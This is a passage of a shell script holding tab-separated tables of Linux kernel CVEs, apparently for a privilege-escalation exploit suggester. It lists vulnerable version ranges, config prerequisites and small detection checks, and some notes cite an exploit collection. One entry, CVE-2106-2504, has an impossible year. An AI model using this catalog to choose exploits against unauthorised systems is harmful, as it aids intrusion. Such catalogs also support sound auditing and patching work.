   1577 CVE-2022-20409	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1578 CVE-2022-20421	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1579 CVE-2022-2078	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1580 CVE-2022-22057	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1581 CVE-2022-22071	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1582 EOF_DATA_14
   1583 )"
   1584 KERNEL_CVE_DATA_15="$(cat <<'EOF_DATA_15'
   1585 CVE-2022-22265	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1586 CVE-2022-22706	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1587 CVE-2022-23222	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1588 CVE-2022-24354	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1589 CVE-2022-25636	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1590 CVE-2022-25664	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1591 CVE-2022-2590	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1592 CVE-2022-2602	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1593 CVE-2022-27666	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1594 CVE-2022-29582	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1595 CVE-2022-34918	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1596 CVE-2022-38181	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1597 CVE-2022-3910	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1598 CVE-2022-41218	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1599 CVE-2022-42703	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1600 CVE-2022-42895	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1601 CVE-2022-42896	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1602 CVE-2022-4543	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1603 CVE-2022-46395	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1604 CVE-2022-47943	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1605 CVE-2022-49080	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1606 CVE-2023-0179	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1607 CVE-2023-0266	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1608 CVE-2023-0461	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1609 CVE-2023-0590	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1610 EOF_DATA_15
   1611 )"
   1612 KERNEL_CVE_DATA_16="$(cat <<'EOF_DATA_16'
   1613 CVE-2023-1206	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1614 CVE-2023-1829	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1615 CVE-2023-2008	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1616 CVE-2023-20938	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1617 CVE-2023-21400	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1618 CVE-2023-2156	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1619 CVE-2023-2163	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1620 CVE-2023-23586	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1621 CVE-2023-2593	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1622 CVE-2023-2598	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1623 CVE-2023-26083	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1624 CVE-2023-2612	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1625 CVE-2023-2640	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1626 CVE-2023-31248	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1627 CVE-2023-32233	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1628 CVE-2023-32629	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1629 CVE-2023-3269	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1630 CVE-2023-32832	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1631 CVE-2023-32837	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1632 CVE-2023-32878	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1633 CVE-2023-32882	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1634 CVE-2023-33063	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1635 CVE-2023-33106	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1636 CVE-2023-33107	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1637 CVE-2023-3338	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1638 EOF_DATA_16
   1639 )"
   1640 KERNEL_CVE_DATA_17="$(cat <<'EOF_DATA_17'
   1641 CVE-2023-3389	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1642 CVE-2023-3390	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1643 CVE-2023-35001	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1644 CVE-2023-3865	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1645 CVE-2023-3866	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1646 CVE-2023-4130	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1647 CVE-2023-4211	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1648 CVE-2023-42483	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1649 CVE-2023-4273	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1650 CVE-2023-45864	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1651 CVE-2023-4611	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1652 CVE-2023-48409	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1653 CVE-2023-50809	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1654 CVE-2023-5178	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1655 CVE-2023-52440	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1656 CVE-2023-52447	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1657 CVE-2023-52922	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1658 CVE-2023-52926	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1659 CVE-2023-5717	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1660 CVE-2023-6200	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1661 CVE-2023-6241	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1662 CVE-2023-6546	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1663 CVE-2023-6931	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1664 CVE-2023-6932	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1665 CVE-2024-0582	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1666 EOF_DATA_17
   1667 )"
   1668 KERNEL_CVE_DATA_18="$(cat <<'EOF_DATA_18'
   1669 CVE-2024-20018	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1670 CVE-2024-21455	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1671 CVE-2024-23372	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1672 CVE-2024-23373	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1673 CVE-2024-23380	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1674 CVE-2024-26809	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1675 CVE-2024-26921	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1676 CVE-2024-26925	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1677 CVE-2024-26926	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1678 CVE-2024-31333	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1679 CVE-2024-33060	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1680 CVE-2024-35880	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1681 CVE-2024-36016	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1682 CVE-2024-36886	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1683 CVE-2024-36904	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1684 CVE-2024-36974	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1685 CVE-2024-36978	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1686 CVE-2024-38399	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1687 CVE-2024-38402	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1688 CVE-2024-41003	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1689 CVE-2024-41009	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1690 CVE-2024-41010	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1691 CVE-2024-43047	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1692 CVE-2024-43882	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1693 CVE-2024-44068	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1694 EOF_DATA_18
   1695 )"
   1696 KERNEL_CVE_DATA_19="$(cat <<'EOF_DATA_19'
   1697 CVE-2024-46713	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1698 CVE-2024-46740	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1699 CVE-2024-49739	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1700 CVE-2024-49848	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1701 CVE-2024-49882	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1702 CVE-2024-50066	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1703 CVE-2024-50264	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1704 CVE-2024-50302	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1705 CVE-2024-53104	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1706 CVE-2024-53141	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1707 CVE-2024-53197	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1708 CVE-2024-56614	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1709 CVE-2024-56615	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1710 CVE-2024-56626	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1711 CVE-2024-56627	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1712 CVE-2024-56770	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1713 CVE-2025-0072	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1714 CVE-2025-0927	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1715 CVE-2025-21479	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1716 CVE-2025-21666	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1717 CVE-2025-21669	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1718 CVE-2025-21670	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1719 CVE-2025-21692	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1720 CVE-2025-21700	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1721 CVE-2025-21703	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1722 EOF_DATA_19
   1723 )"
   1724 KERNEL_CVE_DATA_20="$(cat <<'EOF_DATA_20'
   1725 CVE-2025-21756	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1726 CVE-2025-21836	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1727 CVE-2025-22056	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1728 CVE-2025-23280	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1729 CVE-2025-23330	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1730 CVE-2025-32463	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1731 CVE-2025-37752	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1732 CVE-2025-37756	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1733 CVE-2025-37899	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1734 CVE-2025-37947	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1735 CVE-2025-38001	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1736 CVE-2025-38003	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1737 CVE-2025-38004	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1738 CVE-2025-38617	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1739 CVE-2025-39946	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1740 CVE-2025-39965	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1741 CVE-2025-40040	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1742 CVE-2025-6349	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1743 CVE-2025-8045	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1744 CVE-2025-8109	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1745 CVE-2025-38236	AF_UNIX MSG_OOB UAF	pkg=linux-kernel,ver>=5.15,ver<6.1.143		1	Fixed in stable 6.1.143
   1746 CVE-2025-38236	AF_UNIX MSG_OOB UAF	pkg=linux-kernel,ver>=6.2,ver<6.6.96		1	Fixed in stable 6.6.96
   1747 CVE-2025-38236	AF_UNIX MSG_OOB UAF	pkg=linux-kernel,ver>=6.7,ver<6.12.36		1	Fixed in stable 6.12.36
   1748 CVE-2025-38236	AF_UNIX MSG_OOB UAF	pkg=linux-kernel,ver>=6.13,ver<6.15.5		1	Fixed in stable 6.15.5
   1749 CVE-2106-2504	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1750 EOF_DATA_20
   1751 )"
   1752 KERNEL_CVE_DATA_21="$(cat <<'EOF_DATA_21'
   1753 CVE-2015-8550	double-fetch	pkg=linux-kernel,ver=4.19.65		1	From kernel-exploit-factory detail section (test version Linux-4.19.65)
   1754 CVE-2017-8890	inet_csk_clone_lock double-free	pkg=linux-kernel,ver=4.10.15		1	From kernel-exploit-factory detail section (test version Linux-4.10.15)
   1755 CVE-2019-8956	sctp_sendmsg null pointer dereference	pkg=linux-kernel,ver=4.20.0,x86		1	From kernel-exploit-factory detail section; exploit chain is documented for 32-bit with CVE-2019-9213
   1756 CVE-2021-31440	eBPF verifier __reg_combine_64_into_32	pkg=linux-kernel,ver>=5.11,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1		1	From kernel-exploit-factory detail section and exploit prerequisites
   1757 CVE-2021-4154	cgroup fsconfig type confusion	pkg=linux-kernel,ver=5.13.3		1	From kernel-exploit-factory detail section (test version Linux-5.13.3)
   1758 CVE-2022-2588	route4_filter double-free	pkg=linux-kernel,ver=5.19.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1		1	From kernel-exploit-factory detail section and exploit prerequisites
   1759 CVE-2022-2639	openvswitch reserve_sfa_size integer overflow	pkg=linux-kernel,ver=5.17.4,cmd:grep -qi openvswitch /proc/modules		1	From kernel-exploit-factory detail section; openvswitch module required
   1760 CVE-2025-21702	net/sched qdisc UAF	pkg=linux-kernel,ver=6.6.75,CONFIG_NET_SCHED=y		1	From kernel-exploit-factory detail section (test version Linux-6.6.75)
   1761 CVE-2025-38236	AF_UNIX MSG_OOB UAF	pkg=linux-kernel,ver>=6.16,ver<6.17,cmd:uname -r 2>/dev/null | grep -Eq '^6\.16\.0-rc[123]([-.]|$)'		1	Fixed in mainline 6.16-rc4
   1762 CVE-2026-31431	Copy Fail	pkg=linux-kernel,ver>=4.14,ver<5.10.254,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my]		1	Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0
   1763 CVE-2026-31431	Copy Fail	pkg=linux-kernel,ver>=5.11,ver<5.15.204,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my]		1	Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0
   1764 CVE-2026-31431	Copy Fail	pkg=linux-kernel,ver>=5.16,ver<6.1.170,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my]		1	Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0
   1765 CVE-2026-31431	Copy Fail	pkg=linux-kernel,ver>=6.2,ver<6.6.137,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my]		1	Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0
   1766 CVE-2026-31431	Copy Fail	pkg=linux-kernel,ver>=6.7,ver<6.12.85,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my]		1	Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0
   1767 CVE-2026-31431	Copy Fail	pkg=linux-kernel,ver>=6.13,ver<6.18.22,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my]		1	Upstream issue introduced in 4.14; fixed by stable backports and in mainline 7.0
   1768 CVE-2026-31431	Copy Fail	pkg=linux-kernel,ver>=6.19,ver<6.19.12,CONFIG_CRYPTO_USER_API_AEAD=[my],CONFIG_CRYPTO_AUTHENC=[my]		1	Upstream issue fixed in 6.19.12 and mainline 7.0
   1769 CVE-2026-43503	DirtyClone	pkg=linux-kernel,ver>=3.9,ver<5.10.257		1	Fixed in stable 5.10.257; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules
   1770 CVE-2017-16994	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; appears as related bypass mention
   1771 CVE-2020-27171	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; appears as related comment in exploit source
   1772 CVE-2024-0193	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; appears as upstream source reference
   1773 CVE-2026-43284	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from official Ubuntu/Red Hat Dirty Frag advisories; no stable matcher added
   1774 CVE-2026-43494	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from official Ubuntu PinTheft advisory; no stable matcher added
   1775 CVE-2026-43500	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from official Ubuntu/Red Hat Dirty Frag advisories; no stable matcher added
   1776 CVE-2026-46243	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from official Red Hat CIFSwitch advisory; no stable matcher added
   1777 CVE-2026-46300	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from official Ubuntu/Red Hat Fragnesia advisories; no stable matcher added
   1778 EOF_DATA_21
   1779 )"
   1780 KERNEL_CVE_DATA_22="$(cat <<'EOF_DATA_22'
   1781 CVE-2026-43503	DirtyClone	pkg=linux-kernel,ver>=5.11,ver<5.15.208		1	Fixed in stable 5.15.208; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules
   1782 CVE-2026-43503	DirtyClone	pkg=linux-kernel,ver>=5.16,ver<6.1.174		1	Fixed in stable 6.1.174; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules
   1783 CVE-2026-43503	DirtyClone	pkg=linux-kernel,ver>=6.2,ver<6.6.141		1	Fixed in stable 6.6.141; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules
   1784 CVE-2026-43503	DirtyClone	pkg=linux-kernel,ver>=6.7,ver<6.12.91		1	Fixed in stable 6.12.91; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules
   1785 CVE-2026-43503	DirtyClone	pkg=linux-kernel,ver>=6.13,ver<6.18.33		1	Fixed in stable 6.18.33; exploit path is in the networking stack and may be mitigated by removing the relevant ESP modules
   1786 CVE-2026-43503	DirtyClone	pkg=linux-kernel,ver>=6.19,ver<7.0.10		1	Fixed in stable 7.0.10 and mainline 7.1
   1787 CVE-2026-46331	pedit COW	pkg=linux-kernel,ver>=4.19.244,ver<4.20		1	Fixed before 4.20 in later backports; exploit path uses the traffic-control act_pedit subsystem
   1788 CVE-2026-46331	pedit COW	pkg=linux-kernel,ver>=5.4.195,ver<5.5		1	Fixed before 5.5 in later backports; exploit path uses the traffic-control act_pedit subsystem
   1789 CVE-2026-46331	pedit COW	pkg=linux-kernel,ver>=5.10.117,ver<5.11		1	Fixed before 5.11 in later backports; exploit path uses the traffic-control act_pedit subsystem
   1790 CVE-2026-46331	pedit COW	pkg=linux-kernel,ver>=5.15.41,ver<5.16		1	Fixed before 5.16 in later backports; exploit path uses the traffic-control act_pedit subsystem
   1791 CVE-2026-46331	pedit COW	pkg=linux-kernel,ver>=5.17.9,ver<5.18		1	Fixed before 5.18 in later backports; exploit path uses the traffic-control act_pedit subsystem
   1792 CVE-2026-46331	pedit COW	pkg=linux-kernel,ver>=5.18,ver<6.12.94		1	Fixed in stable 6.12.94; exploit path uses the traffic-control act_pedit subsystem
   1793 CVE-2026-46331	pedit COW	pkg=linux-kernel,ver>=6.13,ver<6.18.36		1	Fixed in stable 6.18.36; exploit path uses the traffic-control act_pedit subsystem
   1794 CVE-2026-46331	pedit COW	pkg=linux-kernel,ver>=6.19,ver<7.0.13		1	Fixed in stable 7.0.13 and mainline 7.1
   1795 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=3.16.52,ver<3.17,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue backported into 3.16 at 3.16.52; mitigated by kernel.yama.ptrace_scope >= 2
   1796 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=4.4.40,ver<4.5,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue backported into 4.4 at 4.4.40; mitigated by kernel.yama.ptrace_scope >= 2
   1797 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=4.8.16,ver<4.9,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue backported into 4.8 at 4.8.16; mitigated by kernel.yama.ptrace_scope >= 2
   1798 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=4.9.1,ver<4.10,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue backported into 4.9 at 4.9.1; mitigated by kernel.yama.ptrace_scope >= 2
   1799 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=4.10,ver<5.10.256,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue introduced in 4.10; fixed in 5.10.256; mitigated by kernel.yama.ptrace_scope >= 2
   1800 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=5.11,ver<5.15.207,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue introduced in 4.10; fixed in 5.15.207; mitigated by kernel.yama.ptrace_scope >= 2
   1801 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=5.16,ver<6.1.173,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue introduced in 4.10; fixed in 6.1.173; mitigated by kernel.yama.ptrace_scope >= 2
